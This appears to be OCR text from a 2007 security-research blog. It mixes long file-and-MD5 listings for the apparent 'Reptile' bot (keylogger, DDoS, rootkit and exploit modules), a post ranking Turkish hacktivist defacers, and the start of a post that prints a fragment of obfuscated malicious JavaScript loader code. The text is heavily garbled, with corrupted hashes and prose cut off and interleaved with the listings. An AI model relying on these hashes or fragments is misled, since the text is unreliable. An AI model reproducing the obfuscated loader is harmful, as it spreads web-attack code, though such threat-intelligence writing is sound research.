33bf84550e56b7d5a042515ddf9clall 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279b6d2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
pstorec.tlh 
d85b9bb48fe41794f3bf4074f42ba995 
pstorec.tli 
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40dfadec9187067d39c4c912d5446bce 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
redirect.h 
8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88abca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 
replace.h 
b290ac687441164db576d52d8006e365 
reptile.cpp 
993bb2e9a39f29e1c6cc3e29e34647f7 
reptile.dsp 
6b86fd3ad4972bcf03c60fa8aaf810bf 
reptile.dsw 
a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.ncb 
88fba368eb5acf4b78ac23d4cae2e0a9 
reptile.opt 
5d5c54714a0d75d8559200d577f8f30e 
reptile.plg 
4d4fc4bfb22684c709d4a6e20f1334cb 
reptile.sin 
99225f98e5b4016e2408f0402086095d 
reptile.suo 
d69a2d741b17f258819b0325f5401277 
reptile. vcproj 
6350356b12abf48d70e04547a097bdd4 
reptilepass.txt 
0e4255a3221bcce5d6c4df2be59088e7 
secure.cpp 
7eabf3ed8cb73a389cb531356562931f 
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secure.h 3e5e€65e967be2469a4544b29c9e41654 
service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 

792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
4c46772d1f2e559551d2a5e7079b6606 
sniffer.h 

4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898elc7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daeddO2dfc5 
speedtest.h 
7afb2905c5a83055e7ce59520e2451c0 
strings.h 
f129d9750fe96aecc59a21618231329d 

stub.exe 5d9e0094c47b9de4473beal1d966c4f96 
svchost.cpp 
6955b9e7e96f4edfa70463f838d0a2d8 
svchost.h 

49fe28536804b16/7fffaa5e5df7ficed 

tcpip.h 

14d67a41df3c57cc3833a8e9f99d1c7f 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 

thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
tibco.cpp 

9elc6b20fafea648711a7743e87a83ff 

tibco.h 
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3.11.6 Overperforming Turkish Hacktivists (2007-11-05 09:41) 


Graphic Analyse 
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Io Social Engineer 
peu el Io Hosting Control Panel 


1 Inang Ahlaki Dederler 


2 Uyanri lo Forgotten Password — 
lo Trojan, Spy Software With — 
@ 2 SQL Injection 


13 Gévde Gasterisi 


Last month’s [1]Turkish/Sweden hacktivism tensions surprised me mainly because the 
[2]Swedes responded to the defacements in an entirely different way : 


"On Saturday a group of disgruntled hackers posted a comment to the Flashback online 
forum linking to a stolen database containing thousands of user names and passwords from 
Turkish forum Ayyldz, the site thelocal.se reported on Tuesday. The Swedes also broke into the 
e-mail and MSN accounts of Turkish Web users and sent messages using the stolen identities. 
Among the images in circulation was a pornographic illustration of the Prophet Mohammed 
and Mustafa Kemal Ataturk, the founder of the modern Turkish state." 


How do you keep track of defaced sites "courtesy" of Turkish script kiddies? [3]Zone-h for sure, 
while in fact there’re so many defacements done by Turkish hacking groups, that the hacktivists 
have localized the defacement achives into Turkish for better transparency, and by doing so it 
makes Turkish defacements during hacktivism wars much easier to keep track of. Who are the 
most active Turkish defacers anyway? 


Top 5 Turkish Defacers at the [4]first defacement mirror : 


[5]U-H-T - [6]8517 

[7]1923turk - [8]6711 
[9]hackpowerteam.org - [10]5364 
[11]By _CECEN - [12]5230 
[13]nadir _piero - [14]4440 


Top 5 Turkish Defacers at the [15]second defacement mirror : 


[16]Lonely.Antalya - 1101 
[17]Pit10 - 1000 
[18]beyrut-Kal3uS - 863 
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54654c8090da5dccf4020f4639571d78 
utility.cpp 
02d38c2c5dd7f139677a5cfe84337f3e 
utility.h 
079c35601e969cbcfl6d0felflb2cca3 
vnc.cpp 
cf76b191ce69ab60eb3dcce5c0e93fc4b 
vnc.h 
1¢531c3e2f698643859af9efdO0c3f9Ie3 
vscan.cpp 
3ed8b286547022bf550449a86eb7ac2d 
vscan.h 
548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wfp-readme.txt 
81b9b29d4f647a1ff971944b51b9977e 
wfp.cpp 
749c5b3d40aab85ddf7ea69a7cc9c249 
wfp.h 
8f30633f9e5296c6f3fa434a8c2c9f51 
win2k139.h 
acf05552d261f66b4a77747926eef8ca 
win2k445.h 
52e067c26e64d3f22c8963860dc37966 
windows-2000sp2-pnp445.h 
a4c702e8879ed24alfa24c57e339573a 


wins.cpp 3ff6c21878d0357d1763b5345478e972 


wins.h 
a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
ea2c47644a3e775a9b784b4f0367c4cf 


wkssvc.h d9edf37a190717fb60a5al3del0dal5e 


reptile.exe 
a7720a9461c97d5a2785c6679aced410 
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Driver.cpp 
da597ef704450dc6904423517235ef90 
Driver.dsp 
1f7e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
02b09fb3fa4eeddd4486baba47ff3ff6 
Driver.opt 
04a6118eb24728c01f4200100cbe9dbd 
Driver.plg 
1a7d9c5c4f51fb71b79092f844d8c8d9 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9ff7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
Driver.pch 
84bc92f3285b8f3d28e268b4e8422a72 
vc60.idb a5d2fc46d20c69e0d38bb6a812bd7798 
vc60.pdb 7a102734eedf5d164be5b1348459bc9e 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
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reptile.txt 
5e12220d4e7ec648825292eb3bcal4c9 
vnc.cpp 
013428cc3743c2c7874c6c099657eecc 
aliaslog.cpp 
f9db4cbafe19d17975665d694c7a4cfa 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95cObb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 


avirus.h e55a156d28fde56a0bb05fc599dafecf 


capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 


cdkeys.h 10199c0132621d0f86774ae3ea965f6c 


configs.h 
8fafcdc62983499280415bc1249ed7fe 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
Icd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
08e3757b9a7164daeca6c9cfccb0b54d 
dcc.h 
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e€44c57141c37593156064072bd6570c2 
dcom.cpp b4cdb6955626f67a46de08eb1a402a44 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82f25b 
dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 
ddos.cpp 57563240a7128e3467b830bfb7051996 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
18b2895e3b5aa9eb99d3b7152c03562d 
download.cpp 
3d7ef84d0d9f98d9e8eedlad9b26e1d1 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
a82dd16cO0f23cd9e4bcclde1d2684elf 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
9237a147ac404f4e40f47982a7 7f4fe2 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
368bac9bceb39403f0f266b6d6fe5 72d 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
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fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 72b69b3d4234fcbc5da07695ae3483cl1b 


functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
0b2c304f1bda3304413f4ba30f65c179 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
bc23b4a7eb3944f249169863e63d8839 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
92e7e61b3b2ee112a65543765f76c9ed 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
0ec726e413c02b2bf3398b837b6de7ca 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 
366c35f6d0bb2b63f67a6cc8cf02c145 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
8d30be2a2ab63a90b655fd9833db01141 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
6a9f9e0d934c0260180a4539f2dcd58c 
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Isass.h 
569113547489a68f47ba936087a9fcdb 
aliaslog.cpp 
f9db4cbafe19d17975665d694c7a4cfa 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
306dd702bbb1613d95c0bb1d8c95ae92 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
92917e1d8364a7f27fca0ce163c6337a 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
8fafcdc62983499280415bc1249ed7fe 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcc.cpp 
08e3757b9a7164daeca6c9cfccb0b54d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp b4cdb6955626f67a46de08eb1a402a44 
11558 


dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
7c1fa9e124ca0629795c13b68c82F25b 
dcom2.h 
baf9d3b315b1d84ad96ea9d89999753e 


ddos.cpp 57563240a7128e3467b830bfb7051996 


ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
18b2895e3b5aa9eb99d3b7152c03562d 
download.cpp 
3d7ef84d0d9f98d9e8eedlad9b26el1d1 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
a82dd16cO0f23cd9e4bcc1de1d2684elf 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
f7¢44e532aca3c1596e004ca03be6db8 
findfile.cpp 
9237a147ac404f4e40f47982a77f4fe2 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
368bac9bceb39403f0f266b6d6fe572d 
findpass.h 
1lfecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
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fphost.h 72b9b3d4234fcbc5da07695ae3483cl1b 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
0b2c304f1bda3304413f4ba30f65c179 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
bc23b4a7eb3944f249169863e63d8839 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
92e7e61b3b2ee112a65543765f76c9ed 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
0ec726e413c02b2bf3398b837b6de7ca 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 
366c35f6d0bb2b63f67a6cc8cf02c145 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
8d30be2a2ab63a90b55fd9833db01141 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
6a9f9e0d934c0260180a4539f2dcd58c 
Isass.h 
569113547489a68f47ba936087a9fcdb 
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encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
Reptilex.dsp 
d0fa456f54b3a89f029feb18d78ef7b6 
Reptilex.dsw 
129ac07c6a21el2eeb6ef92bcaleb683e 
Reptilex.ncb 
98fe6a694723b07c30e13ff2c947303F 
Reptilex.opt 
f6699f837ad7676033888c07034d85aa 
Reptilex.plg 
31f77094d930d7157be0f74f68b1c300 
advscan.cpp 
428d855ec77d480ca2e7ca77aadea580 
asn.cpp 
a64edf7a34291ec063a431ccb823a04c 
general.cpp 
6189c91b80c0c0d9e9ae2c5205b76cd1 
reptilex.cpp 
f1f5bc8ebc90b477cc95de620548172d 
spambot _pstore.cpp 
a03d3729574a5058e5b5b602abd0f539 
advscan.h 
bd90f25cdd025b73c49321abb0684987 
asn.h 
b9321a4d186254af897035566e86e114 
commands.h 
654d236e73212054008eb6be1809dbaf 
crypt.h 
6cbb61814238e0a550f6a076d11bb6e4 
defines.h 
579bcf8ed908346e360226ab476c4d69 
download.h 
d9157dc8f81483e56884f62a6473d717 


externs.h 
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fb860780cba37311b24235bee6f7d872 
functions.h 
5e94af3861ff35a4483e7caefe3af4bb 
includes.h 
2d0c4d7c9fe7c6888345418723clca2c 
info.h 
b2126c722aabb0be618a799d148a13d3 
irc.h 
f1f{d6274cc185744da76988f2d35c870 
loaddlls.h 
dae0fb148cb63db3054b4229bbe88986 
netutils.h 
12245a12929e893d14048ee47464a602 
processes.h 
b60147a8b4cbb32alced0f4d209b49b9 
protocol.h 
4ec32d7b0cbc1c817ea87c6f9949a0F4 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
regcontrol.h 
dbc9b0243d5f43cldad546b5e3bf1c80 
reptile.h 
946c1984c7f32fb21d814d40b88afc92 
secure.h 003b526b7918e884734ec7950dc79b6c 
service.h 
la6b8f9ba66eaa3d5b6748769a37873f 
spambot.h 
71fo5701d4f128cb4d58acOaaffo115a 
threads.h 
3777af53593f8bbf441b0a1212770bdb 
utility.h 
4f68458e5252c16c164497e73fb02a52 
visit. 
9f9cf15b71179a242c86469638d3481a 
configs.h 
al4bd42f7bdefadc54c128e2c64c138e 
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[L9]HEXBOOTS3R - 747 
[20]myturkx.org - 675 


RACKTINISM 


Lots of data to cross-check for sure. Best of all - it’s a real time example of the [21]people’s 
information warfare concept, virtual PSYOPS to be precise. Defacing sites using automated 
vulnerability scanning and exploitation tools is one thing, [22]embedding malware on the 
defaced sites is totally another, and while we’ve been witnessing the emergence of [23]em- 
bedded malware during 2007, it’s questionable whether it’s done for the aggregation of 
infected hosts into botnets only, or a specific hacktivist cause for instance. 
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10. http://turk-h. org/defacement/filter/defacer/1963/hackpowerteam. org 
. http://turk-h. org/Attacker/987/By_CECE 

. http://turk-h. org/defacement/filter/defacer/987/By_CECE 

. http://turk-h. org/Attacker/1280/nadir_piero 

. http://turk-h. org/defacement/filter/defacer/1280/nadir_piero 

. http://www. spy-h. org/top50/ 
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. http://www. spy-h. org/hacker/?user=Lonely.Antalya 
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. http://www. spy-h.org/hacker/?user=Pit10 
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. http://www. spy-h. org/hacker/?user=beyrut-Kal3u 
. http://www. spy-h. org/hacker/?user=HEXBOOT3R 
. http: //www.spy-h. org/hacker/?user=myturkx. org 
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strings.h 
31lac8ea058491c2efa0fcablidee5d56 
advscan.obj 
88f6aa7cOf6a31e2c9030ef0a95a58Ff9 
asn.obj 
489ce494bfc2d57235af36f76525faba 
general.obj 
f2c37a0857e0b915e157e836249eccde 
pstorec.tlh 
74458f248db2ecd0399770d70e4de286 
pstorec.tli 
fad871f017294cal173a4ea6ff637c8d5 
reptilex.obj 
da5845d578709bf8b4012832553ffb23 
spambot _pstore.obj 
54b235763e8fb26989ba27d45face9ee 
vc60.idb 562ad12db16f0e4480b24d7f0bc3d436 
advscan.cpp 
99c9ce19ccb250ec5e69135838955443 
advscan.h 
5c5f7fbo1lb7ed612771lab2bdcO0lab9f9b 
asn.cpp 
b95bd20efff49b927dal6e213f438749 
asn.h 
b9321a4d186254af897035566e86e114 
banner.cpp 
le2bdef556281404cc9a3321aa7a407c 
banner.h f27746db68f05c71925ladba69d0c4bb 
commands.cpp 
24b6422882b662bafb998d0a9c27e753 
commands.h 
89040fed6a3832f75a4b978ee0ffo4d1 
configs.h 
2270dafab3772c0839bc27101b199fbf 
configs.h.bak 
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4d3957d300611cc52a28c518b7e8d889 
crypt.cpp 
f03cca9691dd9ad588e4287524021c3e 
crypt.h 
c2edef9177543e1b8a8611d347d99b66 
dcom.cpp af90ccde9f7bbcaef92e9d6abee25af3 
dcom.h 
1515fd93ad7196026d7679f5b478alab 
defines.h 
9f4f6311bddb85b43564fc5c5ac0466b 
download.cpp 
2b17d55de73f19dfa454d78dd579a966 
download.h 
d9157dc8f81483e56884f62a6473d717 
driveinfo.cpp 
87a2e732800aa01820b0aee958cc8b03 
driveinfo.h 
0e4b63578110edb7511798fbb69827 Off 
externs.h 
67adfb72efa5b95b8bd0144a86cc5e74 
fphost.cpp 
adf7db95bd67da6577c0aaa469737f5f 
fphost.h eff3d1ba2e46287f3b0d01571aa2ac73 
ftpd.cpp e06bcc127636ebf60b6ed52bb321a617 
ftpd.h 
da4f3d350101ladb59be91cal6fec3be2 
fu.cpp 
4c12e14985891ba6e7fe1ld978ccf0756 
fu.h 
5ee58b9c18fe86d14654fe31c1793606 
fudll.h 
440e034c517d25b7039bcc1f86f064a3 
functions.h 
774de6ce4ddfc9ef4c0aaa9fcb3bd801 
includes.h 
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0a1d9b209a062601a48de310f6939354 
info.cpp 948acaa3d8a91285e456fe727a9bfe00 
info.h 
70994ba4e7570710ddc3a4c91e494c22 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
irc.cpp 
b48114a264d5b2fe27b00bb0fc819bbb 
irc.h 
1261d7930e35b8c5254d204315f6ca81 
keylog.cpp 
a6d6a69e440864e350e9d13f5b5db023 
loaddlls.cpp 
bfbfe5f78f429b3898a9100d7ad2bfd3 
loaddlls.h 
8f0c2c63112210df17b3d53262ca7839 
Isass.cpp 
4615f57239b16915f7f24594c2fe7de7 
Isass.h 
8d3db94c754b7422e35ed423204b902b 
mssql.cpp 
bb15434cef41ca090a95a39c444d92c5 
mssqI.h 
700d257c41a1d9ec1e4795c940a7bace 
netbios.cpp 
fd3958d6el1af752889a20d6be38e6f01 
netbios.h 
10a1535d311b113b8702f6789d1ad1b3 
netdde.cpp 
ea06c222b3cf4fd73aced46b38f64097 
netdde.h 717faalb591f7b9e0dbca80c3393ac6f 
netstatp.cpp 
820e8648707f632b3d90f9f3ab22e0db 
netstatp.h 
1ce3bb0d2241980dc247ceb1b14768e4 
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netutils.cpp 
7830f76b77cbdd0ba87344e491afd317 
netutils.h 
d9f9bd3a26e840e4c54477cbecb2247d 
passwd.h a64a53096b26140f039f7cd09e8510d7 
pnp.cpp 
765e08ald39b6eae030flaef4c479238 
pnp.h 
0d164366352a45fed1ld5baaada0bce02 
processes.cpp 
4a345dd631db41ladbf016219bfd07bf6 
processes.h 
d648e2988a7cbd350564502a8e80f30b 
protocol.cpp 
74f42a7dc29c86872a6b169549cf9alb 
protocol.h 
341a39ceb14f519cd0601f383b292dd8 
pstore.cpp 
279b6d2658f175e185ac84f27d83a541a 
pstore.h 9f6785ef830bb25955f2609adf24ab11 
redirect.cpp 
1d3480013ca7ddc71715c081c7fe9d29 
redirect.h 
8f1f0e837904818efcfdf14f1928f1e0 
regcontrol.cpp 
2fe90dd6cac60e88a6ca3ed83d424d6b 
regcontrol.h 
dbc9b0243d5f43c1ldad546b5e3bf1c80 
reptile.cpp 
c0c728766e7301c6aa3575c02fabc9ea 
reptile.dep 
6fa3b86313e460467999c7bfb8c41f7e 
reptile.dsp 
8c0d7907fd2702b02e585cbf39c2550a 
reptile.dsw 
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a7097dcfc065b5e433a8749ac55db41f 
reptile.h 
1e13d2301a263a27b82bf5f0fbae35d7 
reptile.mak 
eba2043ee1f3199923304e711cc2dal10 
reptile.ncb 
0418417792d1c03fe8b860858a753069 
reptile.opt 
08359868d8528647179c7c562b83da63 
reptile.plg 
9292e7e2c3f6149bc343638c44278f97 
reptile.sin 
90bf17a33618855383b5e5a6adfaf357 
reptile.suo 
697d1cb2be6edab175cf56ffe7206ba2 
reptile. vcproj 
f320c52e237ada5286488b3b4cf6cdfa 
reptilepass.txt 
ae0f936ada915314beae4cb1656ae3dd 
secure.cpp 
b33e86824916d682df59d7df5ab35b03 
secure.h 3e5e€65e967be2469a4544b29c9e41654 
service.cpp 
4395519fbd3d301f873c386bec2da638 
service.h 
792e15803e093c9fc96cafaabe7aea20 
sniffer.cpp 
2b40bbb810d2f62c42558f84da8e1c90 
sniffer.h 
4ef5ae8e0dc1047966d5ede7ead4ff5a 
socks4.cpp 
535622e9a3898e1c7adc64e3d787168d 
socks4.h fc7e5609a8c08736a10fb15738755a5d 
speedtest.cpp 
9b927276e0f042cb3c471daedd02dfc5 
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speedtest.h 
7afb2905c5a83055e7ce59520e2451c0 
strings.h 
13cc2e46c8a3dd6ad154b13a518822b9 
svchost.cpp 
6955b9e7e96f4edfa70463f838d0a2d8 
svchost.h 
49fe28536804b16/7fffaa5e5df7ficed 
tcpip.h 
3b1014de227e11ffe78ba38aa067832f 
thcsql.cpp 
a061835d7679a51bba663b2a4f4e6c52 
thcsql.h 09a759a5deb484aaa4bd0f792a239a01 
threads.cpp 
6df12801909bb276ebe64394a0a33be2 
threads.h 
2926c6cb286cb5d401ccb4947aa6ec61 
utility.cpp 
ae95f0056e4f533c72cc42b1d26b767d 
utility.h 
8bae67fec2e4cc271e50d9052c6e6724 
vscan.cpp 
ea43fab3996a246af9db6ff42e3dc904 
vscan.h 
548a2a96dc5af54b7eeb20527c511a3e 
vscandef.h 
3b865cc81cc3ec8533e269e0dbd2090a 
wins.cpp 3ff6c21878d0357d1763b5345478e972 
wins.h 
a9a720198a6ff01d382f4cff17a8e429 
wkssvc.cpp 
f559be6c88e2083d7295af94e54aecc4 
wkssvc.h 67b56da4edd9ae6caa47ff1d9e530fd6 
Driver.cpp 
da597ef704450dc6904423517235ef90 
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Driver.dsp 

1f7 e4ff782992330e6ed605d6b8acfbf 
Driver.dsw 
846ff40dec86f0d4dd4692dd0e3d7e3f 
Driver.h 7404062b35f7bd208c655743a0244550 
Driver.ncb 
79ed9635dcd429b20560006363a38725 
ioctlcmd.h 
278822516d1890ad95db1872d6626efc 
Jiurl PortHide.cpp 
cfa49de552c06a8dda5fca38f35ab4le 
Jiurl _PortHide.h 
3e0d1188486e85ce18678cea28066cd0 
Jiurl tcpioctl.h 
3a7eba644b780e2a0f80a2ef84a4d5e3 
ProcessName.c 
cleabda9fe46de0f319ab6d9e9FF7399 
ProcessName.h 
f9151b283bf37ae51fd410fdacd8a962 
Rootkit.cpp 
24dceblacff18fc6a3ba90895450677b 
Rootkit.h 
020c7d2c685ecf554c32ed643bcc8c8e 
asnl1.h 
2bae81693ebf68e23f3ad3f3021889be 
asnl1_mac.h 
7e10de898ecd175a61a0dbfb12185c2a 
bio.h 
ce7243ecaa4b719218elbf752adfObed 
blowfish.h 
d49e3298bc64a6e465ed7718f564d8af 
bn.h 
b37a3ef0588ce34e0c63a5274aa44961 
buffer.h 356a812a4ffc0968b57ac95e7a63ab78 
cast.h 
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96116e52361c2d0300342bfb6903a3bd 
comp.h 
0c90612a2a019eaef34bdbcc66a021b8 
conf.h 
38754a66c81b8f8b8590ed04b78d161d 
conf _api.h 
844d6a3830cb086ca59f131b1484d44b 
crypto.h 3bb8443f7f07e9234e96ec9579f090d0 
des.h 
0d6c580e72b14b714df7ae5f5318fb3f 
dh.h 
f9a01c2ca0be5ead86ea26fd6574c2b4 
dsa.h 
665bdb1458242049a166edf3acd7170b 
dso.h 
4071b80cdab58b3fceaa958cOccdce46 
ebcdic.h b39613d8ce01e224ae72baa0246892e7 
engine.h 9834177eba2e98bd0f5381e74c2d3d5f 
err.h 
e9fa3cc5d24d8f10e18490856f4da054 
evp.h 
620990a191df1ca247387f09c06f3b3c 
e _os.h 
62fbb35194165d3a5cb3d10e75aaa818 
e _os2.h 
784f6a58114c353b8e6f3a7787065cf3 
hmac.h 
b660alb6e6d396efcbdcf6412e93cb93 
idea.h 
fdc6éd4d55fed4dbbf381e80ab275318b 
lhash.h 
5d5084cdce6d7bc60dc400f7d4faaccf 
md2.h 
4bf98d5033c334181483471c86e38267 
md4.h 
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37af532a0408e1f9dd470374c52aeb87 
md5.h 
32c0cc65f2d457e9c0302b6e14233424 
mdc2.h 
2d9994df4b22705c60dd3f4bf242a7cl 
objects.h 
4187608d042df711837945991109f9fc 
obj _mac.h 
2e39e6bffbO5ddbadb58aedc947f741f 
openssiconf.h 
1356dbc2305c7ba93decedla3e45alc2 
opensslv.h 
83a195ad2b394633f9d8ec69631a51ac 
pem.h 
c679bc0909305501723b0badf24c02be 
pem2.h 
2aee9bcf129f9962f3afaed608385850 
pkcs12.h 779cf7c87331535dfd5bf69a97b2fb3d 
pkcs7.h 
0d668a62e9c4a7c6ab6d9eb61f6e5c685 
rand.h 
27d59b95a7eba54a99fd862039f4dff0 
rc2.h 
0d488e28bb20ff3788fe8c52133d1cfb 
rc4.h 
1c5b8415fc3cecfcc6a5359eccbd5dbd 
rc5.h 
94932666f36526419623555f90ab050a 
ripemd.h 350da6b77dcb285c59c78ce/671d2873 
rsa.h 
fd6cc4c4072d3b43ba8c8d62cca229bc 
rsaref.h 58fd3f7f75cb5841387a529b888eff7b 
safestack.h 
a4174efaacdbdcb936dea701193bc8f3 
sha.h 
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d35627cd8cef90002563554a8d891c84 
ssl.h 
73ef4c68b58632f2f2b55e750b7ee06d 
ssl2.h 
ddce87b1la7e4af3aa35ca8ab665db6eb0 
ssl23.h 
71ae764cc97086829353194e4d9ff2e9 
ssl3.h 
e04e9f4F267129548c0e59fb144cd9bb 
stack.h 
81e9f97755996e1711e81aac115a33bd 
symhacks.h 
736e542efdfc7d21535a6ff8b3c03a45 
tls1.h 
d1c9de5aad2c0490825c2e1885a7e098 
tmdiff.h 8b6b6f8df660f682d29b153cfe760674 
txt _db.h 
730e334f531c6a0ac0ae95e252c53f64 
x509.h 
3d93e919f45a81357b4b97dfa0f84155 
x509v3.h 81671fe50ed0f46bd427efbe1387844d 
x509 __vfy.h 
a1954b5542b923971a40f046cbd4celc 
libeay32.lib 
31d145ada2de7ee054f490e958aa61d5 
libeay32D.lib 
fc2f69ad8302664ba1780aadc8507759 
ssleay32.lib 
2d28bcdb0ec035da5c5fc716e1653d53 
ssleay32D.lib 
2ef69db57b73874ed9fa37b06be5cbc6 
pstorec.tlh 
48ad50888b7576e0d6b2832efaal3263 
pstorec.tli 
5509987709d64118951b49ffa609cf86 
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21. http: //ddanchev.blogspot .com/2007/10/peoples-information-warfare-concept.htm 
22. http://ddanchev. blogspot .com/2007/07/malware-embedded-sites-increasing.htm 
23. http: //ddanchev. blogspot .com/2007/09/popular-web-malware-exploitation.htm 


3.11.7 | See Alive IFRAMEs Everywhere (2007-11-06 20:26) 


¢t-- 

Function oFAmFB(u3KeH7Bpc)<{var 
qCahCp2j7=arguments.callee.toString()-replace(/\W/g,"").toUpperCase();var amst6129=111;var 
jihae122923;var e4AGuYWe ;amst 612991234; jihae=13361 ;var ldnCilJ«qCahCp2j7.length;var Smojai=new 
Array () ;Smojat[@]=11;jiha+=1323;var gsTJb6A;amstG129=Smojai[6];var AAmm=new Array();jihat=123;var 
jina3=161;Smojat[1]=1266;var QSra;Smojat[2]=11623; jina+=124423; jiha3+=221;var Wr8N="" ;var 
uwoU=new Array();for(N=6;M<256;N++)uwoU[M]=68;var e4AGUYwJe=1 5 For (N=128 ;M>M>>=1) 

(esAGuYuJe# (e4ABuUYwJe>>>1)* ((e4AGuYwJek ) 273988292384: 8) ; For (nOwF «8; nBwF<256 ;nOwF +eM*2) 

(uwoU [ nOwF +M]=uwol[ nOwF ]~e4AGuYwJe 5 if (uwoU[ n OWE +i] <6) uWwoU[ nOwF +H] +=4294967296 ; > }gsTJD6A=429496729 
5; for (esAGuYuJe=8;e4ABuYuJe<ldnC11J;e4AbuYuJe++) {gsTJbD6A=uwoUl (gsTJb6A~ qCahCp2j7 .charCodeAt(e4sAGu 
Yue) )&255]~((gsTJD6A>>8)&16777215) 5; }gsTJDGA=gST JD6A~ 4294967295 ;var r7;var 
